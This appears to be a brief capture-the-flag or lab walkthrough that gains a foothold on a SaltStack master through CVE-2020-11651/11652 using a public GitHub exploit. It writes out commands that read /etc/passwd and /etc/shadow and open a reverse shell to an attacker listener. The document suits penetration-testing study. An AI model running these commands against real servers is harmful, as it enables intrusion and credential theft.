NETWORK
SCAN
ENUMERATION
FOOTHOLD
Vulnerable SaltStack
After a bit of research, I found that SaltStack is using ZeroMQ as the default transport protocol.
SaltStack is related to these exploits: CVE-2020-11651 and CVE-2020-11652
Searching around these CVEs we have found https://github.com/Al1ex/CVE-2020-11652
RCE via SaltStack
We are able to retrieve the files /etc/passwd and /etc/shadow using the following command
python3 CVE-2020-11652.py --master 192.168.74.62 --port 4506 --exec-choose master --read /etc/passwd
Reverse shell
We are able to get a reverse shell on the server using the following command
python3 CVE-2020-11652.py --master 192.168.74.62 --port 4506 --shell-LHOST 192.168.49.74 --shell-LPORT 4505